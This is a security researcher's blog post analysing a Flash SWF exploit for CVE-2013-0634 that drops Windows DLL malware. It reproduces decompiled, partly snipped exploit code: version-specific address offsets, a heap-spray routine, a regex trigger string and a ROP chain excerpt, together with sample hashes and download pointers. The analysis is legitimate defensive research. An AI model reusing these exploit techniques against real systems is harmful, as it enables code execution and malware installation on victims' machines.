Sunday, February 10, 2013

"Confirmed ITW" CVE-2013-0634 This LadyBoyle is not nice at all.

It was all started from a curiosity, and ending up into a serious analysis, testing and reporting..
So we have the SWF exploitation of CVE-2013-0634 and I dare myself to analyze of what we suspect as the sample of it, to try to understand what is really going on there. Warning :-) I am a unix engineer and not a Flash developer, so bear with some missing in here and there. There are still so many unsolved mistery and questions myself, please feel free to ping me in twitter or put your comment for the better thought.

Summary of analysis of a suspected CVE-2013-0634 sample


I'd like to put the conclusion first, since the analysis is long and will be a continuation, The result is not so far to what FireEye released-->>[HERE]
But I prefer to peel in more details on the code only and not to include the payload details in this partial post since the exploit details itself is taking a long explanation as per follows:

Summary

The malicious SWF checks/detects whether your system is x32 or x64, it provides both malwares and exploit scheme including the exploit data streams for both platforms (suspected two types of x32 & x64 a shellcodes also exist & still under investigation).

In my case upon the post exploitation it drops stream-out "extract" a DLL malware file from the embedded binary object. The shellcode itself will drop a malware library into %Temp% path and execute it to drop the malware executable binary.

The extraction embedded attachment process is well explain in the Adobe API reference -->>[HERE]
Which I quoted as per below:

ByteArrayAsset is a subclass of the flash.utils.ByteArray class which represents an arbitrary sequence of byte data that you embed in a Flex application.

The byte data that you are embedding can be in any kind of file, and the entire file is always embedded. You cannot embed the bytes of a particular asset that is in a SWF file, although you can embed an entire SWF file.

The MXML compiler autogenerates a class that extends ByteArrayAsset to represent the embedded data. :

The compiler autogenerates a subclass of the ByteArrayAsset class and sets your variable to be a reference to this autogenerated class. You can then use this class reference to create instances of the ByteArrayAsset using the new operator, and you can extract information from the byte array using methods of the ByteArray class:

var storyByteArray:ByteArrayAsset = ByteArrayAsset(new storyClass());

To be NOTED: the binaries are not encoded in JS/code parts, JS/code was used for exploitation act.
The post exploit itself runs the function x32 or x64 to extract the object. Which are windows x32 and x64 DLL files. It is aiming ONLY for windows platform, with aiming exploitation for flash versions:

11,5,502,146 11,4,402,287 11,5,502,135 11,4,402,278 11,5,502,110 11,4,402,265
The exploit was said aiming the ActiveX, yes, thus in the sample I analized I saw codes showing the checks on it, BUT, in codes also I saw exploitation scheme for the Flash player without ActiveX support.
*) You'll see the explanation of the theory above in the code analysis parts.

The method of flash.utils::ByteArray, following by flash.utils::Endian and the callpropvoid of writeInt to push the malicious Endian codes is the execution part of this exploitation. While before it we can find the usage of stack overflow by malicious codes like 0x41414141 and 0xFFFFFFF8 in the Flash Vector object formed, and the method of using textfield(with having the font parameter in it) to be filled with the vector object formed.

Strings used for exploitation is cleverly scattered between _local* variables, made us difficult to trace it by eyes, so by the help of debugger we can understand the flow.

I'm currently in the middle of separating exploit strings while writing this at the same time & trying to find the solid PoC of shellcode which still in process. Since the reference of exploit in this CVE is still not clear here and there (like some reference mentioning buffer overflow while other mentioning memory corruption) and also considering that new information is still keep on popping up, thus the lack of analysis sample of CVE-2013-0634 SWF file itself (so far I found only ONE "suspected" sample of CVE-2013-0634 posted in VT), made me think to have a break for a while and taking liberty to split the post into parts (1 and 2) make updates in the related topic.

The Sample

New information: As per advised I took liberty to choose sample posted in VirusTotal -->>[URL], and I picked the recent one with the below details:
Sample : ieee2013.swf
MD5    : bf29f7d83580b4b4355dbc8a82b4972a
SHA256 : 19a5e24e8c90e2d7f65729455c3fd8b89ebbfdc8d218db3ab4a3193100106267
File size: 498.8 KB ( 510762 bytes )
File name: ieee2013.swf
File type: Flash
Tags: exploit flash cve-2013-0634
Detection ratio: 12 / 45
Analysis date: 2013-02-08 19:32:42 UTC ( 17 hours, 20 minutes ago )
Malware names:
F-Secure                 : Dropped:Trojan.Agent.AYAF
DrWeb                    : Exploit.CVE2013-0633.1
GData                    : Dropped:Trojan.Agent.AYAF
Norman                   : Shellcode.E
McAfee-GW-Edition        : Heuristic.BehavesLike.Exploit.Flash.CodeExec.O
MicroWorld-eScan         : Dropped:Trojan.Agent.AYAF
Avast                    : Win32:Malware-gen
nProtect                 : Dropped:Trojan.Agent.AYAF
BitDefender              : Dropped:Trojan.Agent.AYAF
McAfee                   : Exploit-CVE2013-0633
ESET-NOD32               : SWF/Exploit.CVE-2013-0634.A
Microsoft                : Exploit:SWF/CVE-2013-0634
At the time I choosed, it was so convincing.. But during analyzing the sample deeper it turned out fakes..

Updates - 2013, Feb 26, just before midnight..

Eric Romang (@eromang) found CVE-2013-0634 in the wild spread by Gong Da(d) Exploit Kit, which can be read in his report here -->>[HERE] The sample he uploaded into Virus Total in here -->>[VIRUS-TOTAL] And I confirmed it as the same code as we posted in this post. Snapshot of the codes is: So this is the hard evidence for this exploit that infects in the wild. For the research purpose, you may confirm yourself here -->>[HERE] I thank Eric Romang for the sharing the information that we must aware of!

Understanding the Structure

It is good to visualize the structure of swf sample. I use Action Script for this purpose, this sample looks like below: We need to break it down now, using SWF dumper tool to see the format:
 * Total # of File Tags: 88
 * End (0) -- total: 1
 * ScriptLimits (65) -- total: 1
 * DoABC2 (82) -- total: 1
 * ShowFrame (1) -- total: 1
 * FileAttributes (69) -- total: 1
"* DefineBinaryData (87) -- total: 2 <==w00t"
 * SetBackgroundColor (9) -- total: 1
 * ProductInfo (41) -- total: 1
 * FrameLabel (43) -- total: 1
 * SymbolClass (76) -- total: 1
 * Metadata (77) -- total: 1
↑so we HAVE two binaries embedded from the beginning. Viewing the meta data we know it fakes "Adobe Flex 4 Application"
<Metadata>
  <rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>
  <rdf:Description rdf:about='' xmlns:dc='http://purl.org/dc/elements/1.1'>
  <dc:format>application/x-shockwave-flash</dc:format>
  <dc:title>Adobe Flex 4 Application</dc:title>
  <dc:description>http://www.adobe.com/products/flex</dc:description>
  <dc:publisher>unknown</dc:publisher>
  <dc:creator>unknown</dc:creator>
  <dc:language>EN</dc:language>
  <dc:date>Feb 4, 2013</dc:date>
  </rdf:Description></rdf:RDF>
</Metadata>
I tend to check SWF timestamp in product info:
<ProductInfo product='Adobe Flex' edition='' 
  version='4.6' build='23201' 
  compileDate='Tue Feb 5 00:56:14 2013 UTC'/>
Checking the SymbolClass:
<SymbolClass>
  <Symbol idref='1' className='LadyBoyle_the_x32_Class' />
  <Symbol idref='2' className='LadyBoyle_the_x64_Class' />
  <Symbol idref='0' className='LadyBoyle' />
</SymbolClass>
↑You'll see the classes with the string of x32 and x64 in there.. These are binary tags:
<DefineBinaryData id='1' idrefName='LadyBoyle_the_x32_Class' length='247296' />
<DefineBinaryData id='2' idrefName='LadyBoyle_the_x64_Class' length='246272' />
So let's confirm whether the embedded binaries are really there, if so let's figure its type. Recheck by hex of the symbol class part.. to double check...
3f 13 42 00 00 00 03 00 01 00 4c 61 64 79 42 6f | ?*B*******LadyBo |
79 6c 65 5f 74 68 65 5f 78 33 32 5f 43 6c 61 73 | yle_the_x32_Clas |
73 00 02 00 4c 61 64 79 42 6f 79 6c 65 5f 74 68 | s***LadyBoyle_th |
65 5f 78 36 34 5f 43 6c 61 73 73 00 00 00 4c 61 | e_x64_Class***La |
64 79 42 6f 79 6c 65 00                         | dyBoyle*         |
OK looks binaries are there..to be sure, let's dump and see it.. Here's the x32 first block...
ff 15 06 c6 03 00 01 00 00 00 00 00 4d 5a 90 00 | ************MZ** |
03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 | **************** |
00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 | ****@*********** |
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | **************** |
00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e | **************** |
00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 | ****!**L*!This p |
72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 | rogram cannot be |
20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 |  run in DOS mode |
2e 0d 0d 0a 24 00 00 00 00 00 00 00 7c 49 48 4c | .***$*******|IHL |
38 28 26 1f 38 28 26 1f 38 28 26 1f 31 50 a2 1f | 8(&*8(&*8(&*1P** |
21 28 26 1f 31 50 b3 1f 28 28 26 1f 31 50 a5 1f | !(&*1P**((&*1P** |
70 28 26 1f 1f ee 5d 1f 3b 28 26 1f 38 28 27 1f | p(&***]*;(&*8('* |
77 28 26 1f 31 50 ac 1f 3b 28 26 1f 31 50 b7 1f | w(&*1P**;(&*1P** |
39 28 26 1f 52 69 63 68 38 28 26 1f 00 00 00 00 | 9(&*Rich8(&***** |
00 00 00 00 50 45 00 00 4c 01 05 00 fc 40 10 51 | ****PE**L****@*Q |
00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 | ***********!**** |
00 66 00 00 00 5c 03 00 00 00 00 00 d6 13 00 00 | *f***\********** |
And the second one...x64 binary (1st block snipped)
ff 15 06 c2 03 00 02 00 00 00 00 00 4d 5a 90 00 | ************MZ** |
03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 | **************** |
00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 | ****@*********** |
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | **************** |
00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e | **************** |
00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 | ****!**L*!This p |
72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 | rogram cannot be |
20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 |  run in DOS mode |
2e 0d 0d 0a 24 00 00 00 00 00 00 00 a4 25 09 b1 | .***$********%** |
e0 44 67 e2 e0 44 67 e2 e0 44 67 e2 e9 3c e3 e2 | *Dg**Dg**Dg**<** |
f9 44 67 e2 e9 3c e4 e2 a4 44 67 e2 e9 3c f2 e2 | *Dg**<***Dg**<** |
e9 44 67 e2 c7 82 1c e2 e5 44 67 e2 e0 44 66 e2 | *Dg******Dg**Df* |
b2 44 67 e2 e9 3c ed e2 e3 44 67 e2 e9 3c f6 e2 | *Dg**<***Dg**<** |
e1 44 67 e2 52 69 63 68 e0 44 67 e2 00 00 00 00 | *Dg*Rich*Dg***** |
00 00 00 00 50 45 00 00 64 86 06 00 fa 40 10 51 | ****PE**d****@*Q |
00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 09 00 | **********" **** |
by experience I know both are the DLL files..

Code Analysis

All of the variables prepared for exploitation always appears in pairs.. for example like below, suggested different methods used for x32 & x64:
(_local5[_local7][_local22] as Vector. < Number > )[17] = this.UintToDouble(0xFFFFFFFF, _local9);
(_local5[_local7][_local22] as Vector. < Number > )[18] = this.UintToDouble(0x41414141, 0);
Despite the pairing scheme, also spotted "generic" code scheme i.e.: Checking the exact version of Windows OS:
switch (_local19) {   
    case "windows 7":
        break;    
    case "windows server 2008 r2":        
        break;    
    case "windows server 2008":        
        break;    
    case "windows server 2003 r2":        
        break;    
    case "windows server 2003":        
        break;    
    case "windows xp":        
        break;    
    case "windows vista":        
        break;    
    default:        
        return (this.empty());  };        
It scattered exploit strings into some value of integer with _local%n names, it checked the Windows OS's flash player version & allocate different integer value if flash player contains playertype=activex (see below), ...and...
switch (_local27) {
    case "win 11,5,502,146":
        if (capabilities.playertype.tolowercase() == "activex") {  
            _local25 = (_local16 - 1838536);                       
            _local26 = (_local16 - 574720);                                };            
        break;        
    case "win 11,5,502,135":        
        if (capabilities.playertype.tolowercase() == "activex") {    
            _local25 = (_local16 - 2266027);        
            _local26 = (_local16 - 574864);                    };            
        break;        
    case "win 11,5,502,110":        
        if (capabilities.playertype.tolowercase() == "activex") {    
            _local25 = (_local16 - 1600110);        
            _local26 = (_local16 - 574424);                    };            
        break;        
    case "win 11,4,402,287":        
        if (capabilities.playertype.tolowercase() == "activex") {    
            _local25 = (_local16 - 4624790);        
            _local26 = (_local16 - 574196);                    };            
        break;        
    case "win 11,4,402,278":        
        if (capabilities.playertype.tolowercase() == "activex") {    
            _local25 = (_local16 - 1227937);        
            _local26 = (_local16 - 573876);                    };            
        break;        
    case "win 11,4,402,265":        
        if (capabilities.playertype.tolowercase() == "activex") {    
            _local25 = (_local16 - 7925883);        
            _local26 = (_local16 - 573876);                    };            
        break;
.. then preparing bigger init value for flash without activeX...
default:  
    (_local5[_local7][_local22] as Vector. < Number > )[536870911] = this.UintToDouble(16, _local9);        
    return;  };     
The other part of exploit values are implemented into other "_local*" variables in seperated section as per I pasted it here -->>[HERE] [Additional] As so many other researchers also already noticed, it is spotted the regex operation suspected the direct exploitation by it. Actually I wanted to expose this after getting more info, but OK, since so many questions came.. here we go: It filled a var with this regex string & assigned it to RegExp:
_local2 = "(?i)()()(?-i)||||||||||||||||||||||";
var _local20: RegExp = new RegExp(_local2, "");
To be used in the operation in forming object of exploitation: Why this regex was used? We saw it to be used as per it is.. To grep the pattern defined, PoC the debug code:
3509 pushstring     "(?i)()()(?-i)||||||||||||||||||||||"
3512 findpropstrict RegExp //nameIndex = 66
3517 constructprop  RegExp (2) //nameIndex = 66
3520 coerce         RegExp //nameIndex = 66
And the memory snapshot below:
0a 77 69 6e 64 6f 77 73 20 78 70 0d 77 69 6e 64| *windows xp*wind |
6f 77 73 20 76 69 73 74 61 0c 66 72 6f 6d 43 68| ows vista*fromCh |
61 72 43 6f 64 65 06 52 65 67 45 78 70 23 28 3f| arCode*RegExp#(? |
69 29 28 29 28 29 28 3f 2d 69 29 7c 7c 7c 7c 7c| i)()()(?-i)||||| |
7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c| |||||||||||||||| |
7c 06 6c 65 6e 67 74 68 10 77 72 69 74 65 55 6e| |*length*writeUn |
73 69 67 6e 65 64 49 6e 74 0a 70 6c 61 79 65 72| signedInt*player |
54 79 70 65 07 61 63 74 69 76 65 78 05 66 6c 75| Type*activex*flu |
73 68 0a 77 72 69 74 65 42 79 74 65 73 05 45 72| sh*writeBytes*Er |
72 6f 72 01 65 0c 66 6c 61 73 68 2e 65 76 65 6e| ror*e*flash.even |
74 73 0f 45 76 65 6e 74 44 69 73 70 61 74 63 68| ts*EventDispatch |
65 72 0d 44 69 73 70 6c 61 79 4f 62 6a 65 63 74| er*DisplayObject |
11 49 6e 74 65 72 61 63 74 69 76 65 4f 62 6a 65| *InteractiveObje |
63 74 16 44 69 73 70 6c 61 79 4f 62 6a 65 63 74| ct*DisplayObject |
43 6f 6e 74 61 69 6e 65 72 1a 16 01 16 05 16 08| Container******* |
↑At the time regex executed, it runs w/o crash. So if RegEXP aka regex value of "(?i)()()(?-i)||||||||||||||||||||||" has anything to do with the direct exploitation is still a question to me. The exploitation happened at the time the texfield filled with the malicios vector contains the exploit bit (in my case). That's why I desperately need to seek other samples or better memory shot to be sure of this regex method, & reason why I did not write it before too. [NEW ADDITIONAL] The usage of the regex which functioned as the trigger to the overall exploitation is explained by HaifeiLi -->>[HERE] Let's continue: The _local5 array contains vector <number> and <object> and the below checkpoints was making sure of it if we follow it further the _local5 will be used by additional hard-coded bits: Next.. depends on the processor type it assembled the strings by - using writeUnsignedInt. This is that code for x32...
// initiation of the bins.. see the 0x41 0x41 0x41 starts..
while (_local1 < (0x0400 * 100)) {
    _local17.writeUnsignedInt(0x41414141);
    _local1++;
};

// transfering the result to other vars...
_local12 = (_local12 + _local17.position);
_local14 = _local17.position;


// building the x32 exploit here...with the Unsigned interger flood...
 _local17.endian = Endian.LITTLE_ENDIAN;
 _local34 = _local17.position;
 _local17.position = (_local17.position + 224);
 _local17.writeUnsignedInt(_local25);
 _local17.position = _local34;
 _local17.position = (_local17.position + 160);
 _local17.writeUnsignedInt((_local12 + 0x0100));
 _local17.writeUnsignedInt(_local31);
 _local17.position = _local34;
 _local17.writeUnsignedInt(_local37);
 _local17.writeUnsignedInt(0);
 _local17.writeUnsignedInt(64);
 _local17.writeUnsignedInt(0);
 _local17.writeUnsignedInt(_local39);
 _local17.writeUnsignedInt(0);
 _local17.position = (_local17.position + 40);
 _local17.writeUnsignedInt(_local36);
 _local17.writeUnsignedInt(0);
 _local17.writeUnsignedInt((_local12 + 0x0100));
 _local17.writeUnsignedInt(_local31);
 _local17.writeUnsignedInt(_local38);
 _local17.writeUnsignedInt(0);
 _local17.writeUnsignedInt(0x2000);
 _local17.writeUnsignedInt(0);
 _local17.writeUnsignedInt(_local37);
 _local17.writeUnsignedInt(0);
 _local17.writeUnsignedInt(_local26);
 _local17.writeUnsignedInt(0);
 _local17.writeUnsignedInt(_local40);
 _local17.writeUnsignedInt(0);
 _local17.position = (_local34 + 0x0100);
 _local17.writeUnsignedInt(1442615440);
 _local17.writeUnsignedInt(4041507656);
              :
              :(snipped)
And this is for x64...
_local17.writeBytes(_local35, 0, _local35.length);
_local12 = _local13;
_local15 = ((((_local12 + 128) - _local10) - 16) / 8);
_local12 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
_local15 = ((((_local12 + 16) - _local10) - 16) / 8);
_local12 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
_local12 = (_local12 + _local14);
_local17.position = _local14;                   

//// Buiding x64 exploit, 
_local34 = _local17.position;
_local17.position = (_local17.position + 224);
_local17.writeUnsignedInt(_local25);
_local17.position = _local34;
_local17.position = (_local17.position + 160);
_local17.writeUnsignedInt((_local12 + 0x0100));
_local17.writeUnsignedInt(_local31);
_local17.position = _local34;
_local17.writeUnsignedInt(_local37);
_local17.writeUnsignedInt(0);
_local17.writeUnsignedInt(64);
_local17.writeUnsignedInt(0);
_local17.writeUnsignedInt(_local39);
_local17.writeUnsignedInt(0);
_local17.position = (_local17.position + 40);
_local17.writeUnsignedInt(_local36);
_local17.writeUnsignedInt(0);
_local17.writeUnsignedInt((_local12 + 0x0100));
_local17.writeUnsignedInt(_local31);
_local17.writeUnsignedInt(_local38);
              :
_local17.writeUnsignedInt(0);
_local17.position = (_local34 + 0x0100);
_local17.writeUnsignedInt(1442615440);
_local17.writeUnsignedInt(4041507656);
_local17.writeUnsignedInt(1708274504);
              :
              :(snipped)
The _local17 above was filled by values of vector objects filled by the logic of Random → Vector flood by ByteArray → formed into function ReadDouble to be used to form exploit object, flow details is--->>[HERE] Please be noted the usage of hard coded bit 0x41414141 in the vector object and usage of 0xFFFFFFF8 for gaining heap allocation/deallocation is used. Correction: 0xFFFFFFF8 is used to convert 0x*******1 to 0x*******0 which is the correct address for exploit. ) ←Thank's to @promised_lu for pointing this :-) PS: I still can't figure why the hardcoded 0x41414141 bit is there... The usage of text field with font to be filled by exploit values aiming for the overflow was also detected:
function empty(): void {
" var _local1: textfield = new textfield();"
  _local1.autosize = TextFieldAutoSize.left;
   var _local2: textformat = new textformat();
  _local2.size = 30;
  _local2.font = "Arial";
  _local2.color = 0xFF0000;
"  _local1.settextformat(_local2);"
  _local1.text = " ";
" addChild(_local1);"
After exploit form is built, it went into an execution of part of the forming code the object which in the debug code can be viewed below:
0    getlocal0      
1    pushscope      
2    findpropstrict flash.utils::ByteArray //nameIndex = 19
4    constructprop  flash.utils::ByteArray (0) //nameIndex = 19
7    coerce         flash.utils::ByteArray //nameIndex = 19
9    setlocal3      
10   getlocal3      
11   getlex         flash.utils::Endian //nameIndex = 40
13   getproperty    LITTLE_ENDIAN //nameIndex = 41
15   setproperty    endian //nameIndex = 42
17   getlocal3      
18   getlocal1      
19   callpropvoid   writeInt (1) //nameIndex = 43
22   getlocal3      
23   getlocal2      
24   callpropvoid   writeInt (1) //nameIndex = 43
↑It means: using the flash.utils::ByteArray to write integer as little endian (I call this stream-out referred to Adobe API = "extracting") ..to WriteInt values as per mixed in hex-->>[HERE] (need to split these in two for x32 and x64.. a lot ow work to do..) ..to then execute process below:
25   pushbyte       0
26   setproperty    position //nameIndex = 44
27   getlocal3      
28   callproperty   readDouble (0) //nameIndex = 45
29   returnvalue    
..at this point the return for value pointing LadyBoyle x32 OR x64 binary Class (the code is below)
    import mx.core.*;
    public class LadyBoyle_the_x32_Class extends ByteArrayAsset {
↑for the x32 ..and for the x64↓
    import mx.core.*;
    public class LadyBoyle_the_x64_Class extends ByteArrayAsset {
to extract the embedded object as per described here -->>[AdobeAPIPage] The complete decompilation code of the SWF of CVE-2013-6034 in neutralized code is here -->>[PASTEBIN]

The debug..

It's time to run this swf in debug mode.. like a binary analysis I want to capture everything I could. The (long) complete debug main init trace list is here --->>[HERE] See how it ends up to point classes of the_x32_Class:Class or the_x64_Class:Class You also can grep the "pushint" to grep all of the pushed value related codes - for the x32 and x64 -->>[HERE] If we divided it right we may slit the value of x32 and x64. (on it..) You can compare those strings with the memory snapshot here --->>[HERE] The dump binary can be downloaded here -->>[HERE] Since the code initiate the 32 & 64 bit as detailed classes↓...
this.the_x32_Class = LadyBoyle_the_x32_Class;
this.the_x64_Class = LadyBoyle_the_x64_Class;
...and the below are the trace of execution of LadyBoyle by of 32/64 bit to get the binary object embedded. For 32bit:
init():* 
// disp_id=0 method_id=15 nameIndex = 0 */
// local_count=1 max_scope=4 max_stack=2 code_len=23
// method position=3689 code position=16442 
 0      getlocal0       
 1      pushscope       
 2      findpropstrict LadyBoyle_the_x32_Class //nameIndex = 80 
 4      getlex         Object //<--- nameIndex = 54  
 6      pushscope       
 7      getlex         flash.utils::ByteArray //nameIndex = 19 
 9      pushscope       
 10     getlex         mx.core::ByteArrayAsset //nameIndex = 18 
 12     pushscope       
 13     getlex         mx.core::ByteArrayAsset //nameIndex = 18 
 15     newclass       LadyBoyle_the_x32_Class 
 17     popscope        
 18     popscope        
 19     popscope        
 20     initproperty   LadyBoyle_the_x32_Class //nameIndex = 21 
 22     returnvoid      
The 64bit..
init():* 
// disp_id=0 method_id=18 nameIndex = 0 */
// local_count=1 max_scope=4 max_stack=2 code_len=23
// method position=3701 code position=16498 
 0      getlocal0       
 1      pushscope       
 2      findpropstrict LadyBoyle_the_x64_Class //nameIndex = 81 
 4      getlex         Object // <----nameIndex = 54 
 6      pushscope       
 7      getlex         flash.utils::ByteArray //nameIndex = 19 
 9      pushscope       
 10     getlex         mx.core::ByteArrayAsset //nameIndex = 18 
 12     pushscope       
 13     getlex         mx.core::ByteArrayAsset //nameIndex = 18 
 15     newclass       LadyBoyle_the_x64_Class 
 17     popscope        
 18     popscope        
 19     popscope        
 20     initproperty   LadyBoyle_the_x64_Class //nameIndex = 22 
 22     returnvoid      
The getlex for objects→ByteArray→ByteArrayAsset→is calling embedded "LadyBoyle" class contains malware DLL binary to be extracted in the victim's PC.. [Additional-2] @promised_lu, the author of pmswalker was making a very good reversing for the this exploit sample which exposing security baypass' ROP Chain & SHELLCODE formed during exploitation. You can see his good analysis here -->>[LINK] This is VERY important chain that I was looking for from beginning the existance of the shellcode which explained the below operations: Searching for %Temp% path and load a library, as per below:
   :
069442C2 FFE0  jmp     eax        
; CreateFileA("C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\abc.cfg", 
               GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL) => 
; LoadLibraryA("C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\abc.cfg")
With noted that shellcode use of stackpivot restore the stack back to the normal flow of execution to prevent the crash. He also reversed the abc.cfg executed as libs via shellcode:
     :
 *(_DWORD *)p2 = dword_10009278;             // 'cces'
 *((_DWORD *)p2 + 1) = dword_1000927C;       // 'etne'
 *((_DWORD *)p2 + 2) = dword_10009280;       // 'xx.r'
 *((_WORD *)p2 + 6) = word_10009284;         // 'x'
    :
↑which explaining the dropping of seccetnter.xxx payload. All of the above is possible since the ALSR and DEP are bypassed, and he explianed the ROP Chain for it as per quoted below:
06944000  7C809AE1  kernel32.VirtualAlloc
06944004  06944088  /CALL to VirtualAlloc
06944008  06944000  |Address = 06944000
0694400C  00002000  |Size = 2000 (8192.)
06944010  00001000  |AllocationType = MEM_COMMIT
06944014  00000040  \Protect = PAGE_EXECUTE_READWRITE
#w00t to @promised_lu :-) good job! This solves the all mistery of this exploitation, conclusion:
The usage of hardcoded bits, details in address calculation, using the heap spray with the changes of stack value (stackpivot), with the ROP of by passing ASLR and DEP is a VERY sophisticated technique to be used in this exploitation. The technique exploitation of this sample is proven to be Memory Corruption base of the exploitation.

Research Material & Samples

For raising AV detection rates & research purpose, sample-->>[HERE] The SWF's embedded DLL malwares is having the below VT ratio:
SHA256: d6459e851fda540159a78aa901b46cc2e921c57952e961edf4d817b4f5a82f14 SHA1: c6bff71c4c9ac92f78995ac9097f8cc13779a8fc MD5: b4da1c3400b48803b41823feaf6085e8 File size: 241.5 KB ( 247296 bytes ) File name: CVE-2013-0634-x32bin.drop.dll File type: Win32 DLL Tags: exploit cve-2013-0634 pedll Ratio: 21 / 41 Date: 2013-02-10 17:48:27 UTC ( 37 minutes ago ) URL ---->>[CLICK] F-Secure : Dropped:Trojan.Agent.AYAF GData : Dropped:Trojan.Agent.AYAF VIPRE : Trojan.Win32.Generic!BT Symantec : Trojan Horse ESET-NOD32 : Win32/TrojanDropper.Agent.QAU McAfee-GW-Edition : Heuristic.BehavesLike.Win32.PasswordStealer.H Fortinet : W32/Agent.QAU!tr TrendMicro-HouseCall : TROJ_GEN.R11H1B8 MicroWorld-eScan : Dropped:Trojan.Agent.AYAF Avast : Win32:Malware-gen nProtect : Dropped:Trojan.Agent.AYAF Kaspersky : Trojan.Win32.Delf.dedq BitDefender : Dropped:Trojan.Agent.AYAF McAfee : BackDoor-FAKV!B4DA1C3400B4 Ikarus : Trojan.Win32.Bredolab Panda : Trj/CI.A AhnLab-V3 : Win-Trojan/Infostealer.247296 AntiVir : DR/Agent.AYAF PCTools : Trojan.Generic Sophos : Troj/Agent-ZUP Comodo : UnclassifiedMalware
SHA256: b03623e4818e60869f67dba28ab09187782a4ae0f4539cef2c07634865f37e74 SHA1: 040069e5ecf1110f6634961b349938682fee2a22 MD5: dbc7e219e9af297271ea594f0ff6ad12 File size: 240.5 KB ( 246272 bytes ) File name: CVE-2013-0634-x64bin.drop.dll File type: Win32 DLL Tags: exploit cve-2013-0634 pedll Ratio: 17 / 46 Date: 2013-02-10 17:49:04 UTC ( 39 minutes ago ) URL ---->>[CLICK] F-Secure : Trojan.Generic.8698229 DrWeb : BackDoor.Poison.1033 GData : Trojan.Generic.8698229 VIPRE : Trojan.Win32.Generic!BT Norman : Killav.LB ESET-NOD32 : Win64/TrojanDropper.Agent.U TrendMicro-HouseCall : TROJ_GEN.R47H1B9 MicroWorld-eScan : Trojan.Generic.8698229 Avast : Win32:Malware-gen nProtect : Trojan.Generic.8698229 BitDefender : Trojan.Generic.8698229 McAfee : BackDoor-AKV Panda : Trj/CI.A Ikarus : Win32.Malware AVG : Small.EWV Emsisoft : Malware.Win64.AMN (A) Comodo : UnclassifiedMalware
While trying to figure how the exploit execute the attached DLL, I took a video. and in one of the session I took the video from my Droid camera:

Thank you very much for fellow researchers who encourage be to analyze this:

False Positive Possibilities

I had little discussion with Eric Romang about this matter in twitter. Since this CVE is new, maybe NOW we won't see the false positive of this post's code to be detected as "malware" by some security industry scanner, but I am afraid since most web-scanner is doing string matching for detection of "malcode" in web sites, sooner or later FP will occur, so beforehand I am assuring you there is no malicious codes were posted as per it is here, every code are tweaked, neutralized and cannot run nor be used to infect at all. Furthermore most codes shown are flash JS/code which cannot use as per usual web site's embedded JavaScript.

I am so worry that if some security scanner will use the word "LadyBoyle" to grep & classify the detection of CVE-2013-0634, which exactly will NOT stop the infection of CVE-2013-0634 (since that is just a name of a "changeable" class inside an infector SWF file which I doubt that you can scan it online) BUT it will exactly will block this post to be viewed by public.

This post is dedicated to the security research, hopefully to be a useful reference of CVE-2013-0634, please kindly help to notice us in twitter if the false positive alarm happens. Thank you very much.

Additionals

Just seeing this tweet: I really want to see the sample, if anyone has it please upload it via our blog's DropBox?

The mentioned "font method", or to be precised, in our case was the usage of textfield object (to be filled with exploit data) with setting .settextformat contains a font definition, indeed detected too in this post, but did not see any MacOSX target in my sample, so that must be same type of exploit yet a separately made. I wonder was it a only a MS Word's .doc file?

Reference

[1] Adobe: Security Bulletin APSB13-04 for Adobe Flash Player-->>[Here]
[2] CVE-2013-0633 -->>[Here]
[3] CVE-2013-0634 -->>[Here]
[4] FireEye: LadyBoyle comes to town with new exploit-->>[Here]
[5] Alienvault Labs: Adobe patches two vulnerabilities being exploited in the wild-->>[Here]
[6] Eric Romang Blog: Boeing-job.com Campaign & Flash 0days Additional Informations-->>[Here]

(Fine)

#MalwareMustDie!

12 comments:

  1. Hi. Very nice post, thanks. But i don't see (in LadyBayle) where .exe loaded and run...

    ReplyDelete
  2. Oflenov, I thank you for the kindly comment. Firstly that is not an exe, but the dll files are embedded in there, at least in need the shellcode to use the rundll32.exe or similar API to execute it to run.
    :-) And that's the "question" & mistery that I mentioned in the beginning of the post actually, I am now still working on simulating the things up on the very speedy execution of swf. Hopefully to write the conclusion in the Part 2.

    Stay tune, friend! :-)

    ReplyDelete
    Replies
    1. All of the questions are answered now. No need to have Part-2. I updated the related parts accordingly.

      Delete
  3. Hi Oflenov, just finished confirming how it executes the embedded files. The method of flash.utils.ByteArray class is used to run the embedded object in the SWF. The malicious object which is defided in the tag of <DefineBinaryData id='1' idrefName='LadyBoyle_the_xBLAH_Class' length='xxx' /> was executed eventually by Adobe Flash Player (Please see reference API HERE) which is making the malicious object infection is possible < possible by the mean is general aspect, i.e.: dll cannot be run just like that so I think this sample I use won't infect anyone actually.. Still cannot find any dll executor exist in every dump I made.
    PS, this object execution of the embedded object by this method is the flaw that Adobe covered in the patch.
    Moreover, I finished confirming the shellcode is not exist at all, yet, only vector object contains exploit values of x32 and x64 exists. I will gain more strength to collect the stuffs and write it on the Part2.
    In the end, this exploitation is not as tough as I thought it was, the lacking know how in Flash API, for me, is making this taking time. Hope this answer solved core questions. Be free to recheck.

    Rgds, @unixfreaxjp

    ReplyDelete
